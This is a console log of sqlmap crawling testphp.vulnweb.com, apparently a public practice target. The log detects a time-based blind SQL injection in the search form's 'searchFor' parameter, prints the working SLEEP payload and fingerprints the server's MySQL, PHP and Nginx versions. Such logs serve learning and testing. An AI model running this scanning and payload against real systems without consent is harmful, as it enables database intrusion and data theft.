C:\Windows\System32\sqlmap-dev>python sqlmap.py
C:\Windows\System32\sqlmap-dev>python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat-1" --forms --crawl=2
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.10.1#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:09:56 /2023-10-18/

do you want to check for the existence of site's sitemap(.xml) [y/N] y
[08:10:42] [WARNING] 'sitemap.xml' not found
[08:10:42] [INFO] starting crawler for target URL 'http://testphp.vulnweb.com/listproducts.php?cat-1'
[08:10:42] [INFO] searching for links with depth 1
[08:10:43] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)]

[08:17:55] [WARNING] running in a single-thread mode. This could take a while
[08:17:55] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[08:17:55] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[08:17:56] [INFO] 5/13 links visited (38%)
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] y
do you want to normalize crawling results [Y/n] y
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] y
[08:20:11] [INFO] writing crawling results to a temporary file 'C:\Users\me\AppData\Local\Temp\sqlmapag5zcwss24240\sqlmapcrawler-ozsb68u2.csv'
[08:20:12] [INFO] found a total of 9 targets
[1/9] Form:
POST http://testphp.vulnweb.com/search.php?test=query
POST data: searchFor=&goButton=go
do you want to test this form? [Y/n/q]
> y
Edit POST data [default: searchFor=&goButton=go] (Warning: blank fields detected):

do you want to fill blank fields with random values? [Y/n] y
[08:23:36] [INFO] using 'C:\Users\me\AppData\Local\sqlmap\output\results-10182023_0823am.csv' as the CSV results file in multiple targets mode
[08:23:36] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[08:23:36] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[08:23:37] [INFO] testing if the target URL content is stable
[08:23:37] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[08:25:47] [CRITICAL] can't check dynamic content because of lack of page content
[08:25:47] [INFO] testing if POST parameter 'searchFor' is dynamic
[08:25:47] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[08:25:48] [WARNING] POST parameter 'searchFor' does not appear to be dynamic
[08:25:48] [WARNING] heuristic (basic) test shows that POST parameter 'searchFor' might not be injectable
[08:25:48] [INFO] heuristic (XSS) test shows that POST parameter 'searchFor' might be vulnerable to cross-site scripting (XSS) attacks
[08:25:48] [INFO] testing for SQL injection on POST parameter 'searchFor'
[08:25:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:25:49] [WARNING] reflective value(s) found and filtering out
[08:25:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:25:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:25:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:25:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:25:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:25:56] [INFO] testing 'Generic inline queries'
[08:25:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:25:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:25:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:25:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:26:20] [INFO] POST parameter 'searchFor' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[08:46:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:46:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:46:24] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[08:46:24] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[08:46:29] [INFO] checking if the injection point on POST parameter 'searchFor' is a false positive
POST parameter 'searchFor' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 78 HTTP(s) requests:
---
Parameter: searchFor (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchFor=okhl' AND (SELECT 9237 FROM (SELECT(SLEEP(5)))wwRk) AND 'eAXo'='eAXo&goButton=go
---
do you want to exploit this SQL injection? [Y/n] y
[08:48:54] [INFO] the back-end DBMS is MySQL
[08:48:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[08:48:54] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
SQL injection vulnerability has already been detected against 'testphp.vulnweb.com'. Do you want to skip further tests involving it? [Y/n] y
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/guestbook.php'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/userinfo.php'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/AJAX/showxml.php'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/listproducts.php?cat=1'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/hpp/?pp=12'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/showimage.php?file='
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/artists.php?artist=1'
[08:49:48] [INFO] skipping 'http://testphp.vulnweb.com/comment.php?aid=1'
[08:49:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\me\AppData\Local\sqlmap\output\results-10182023_0823am.csv'

[*] ending @ 08:49:48 /2023-10-18/